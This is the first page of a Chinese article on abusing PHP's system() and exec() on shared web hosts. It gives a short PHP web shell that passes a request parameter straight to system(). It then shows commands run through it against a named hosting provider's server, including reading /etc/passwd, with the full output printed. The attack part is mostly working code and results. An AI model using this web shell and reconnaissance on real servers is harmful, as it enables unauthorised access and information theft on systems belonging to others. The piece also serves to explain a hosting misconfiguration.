构建Linux下的安全,PHP配置漏洞攻击(1)


这些站点的问题主要出在允许使用system(),exec()等等这些函数,熟悉php的朋友应该知道,这些函数是调用系统指令的(虽然通过web server php程序只能有nobody权限),而且一般用户只要申请一个空间就可以获取局部的可写权限,令用户可以写一个web shell程序执行命令.在这些服务器上一般用户不能够登陆,也就是nologin(没有登陆shell,管理员可没那么"慷慨"!),这样利用system(),exec()这些函数就可以bind一个shell出来~!本文以虎翼网(www.51.net)的空间为例子(他是不是所有的服务器都有这个毛病我不知道~我只试验了我的空间所在的服务器):

1.写一个webshell先(php很容易做到)

>php

#shell.php3

echo"

";

system("$cmd");

echo"

";

>

2.上传到空间

3.执行(具体的服务器马赛克处理)

lynx http://xxx.51.net/cgi-bin/shell.php?cmd=id (看一下权限到底多大)

uid=171047(xxxx) gid=51(xxx) groups=51(xxx), 65534(nobody)

root真的很吝啬啊!

lynx http://xxx.51.net/cgi-bin/shell.php?cmd=uname -ras(看看系统)

FreeBSD xxx.51.net 3.3-RELEASE FreeBSD 3.3-RELEASE #11: Tue Mar 20

00:58:09 CST 2001 root@51.net:/usr/src/sys/compile/51NET i386

lynx http://xxx.51.net/cgi-bin/shell.php?cmd=cat

/etc/passwd(shadow是铁定看不到)

root:*:0:0:Charlie &:/root:/bin/csh

toor:*:0:0:Bourne-again Superuser:/root:

daemon:*:1:1:Owner of many system processes:/root:/sbin/nologin

operator:*:2:5:System &:/:/sbin/nologin

bin:*:3:7:Binaries Commands and Source,,,:/:/sbin/nologin

tty:*:107353:51:USER:/home/tty:/local/bin/null

kmem:*:5:65533:KMem Sandbox:/:/sbin/nologin

games:*:7:13:Games pseudo-user:/usr/games:/sbin/nologin

news:*:8:8:News Subsystem:/:/sbin/nologin

man:*:9:9:Mister Man Pages:/usr/share/man:/sbin/nologin

bind:*:53:53:Bind Sandbox:/:/sbin/nologin

uucp:*:66:66:UUCP

pseudo-user:/var/spool/uucppublic:/usr/libexec/uucp/uucico

xten:*:67:67:X-10 daemon:/usr/local/xten:/sbin/nologin

pop:*:68:6:Post Office Owner:/nonexistent:/sbin/nologin

ftp:*:70:70:FTP Daemon:/nonexistent:/sbin/nologin

nobody:*:65534:65534:Unprivileged user:/nonexistent:/sbin/nologin

quotauser1:*:997:51:quotauser:/home/quotauser1:/sbin/nologin

quotauser2:*:998:51:quotauser:/home/quotauser2:/sbin/nologin

quotauser3:*:999:51:quotauser:/home/quotauser3:/sbin/nologin

tian:*:1002:1002::/local/tian:/local/bin/ksh

sysadmin:*:1001:1001:System

Administrator:/local/sysadmin:/local/bin/ksh

test2:*:9999:51::/home/test2:/local/bin/null

xhjj:*:106200:51:USER:/home/xhjj:/sbin/nologin


共3页: 上一页123下一页

相关内容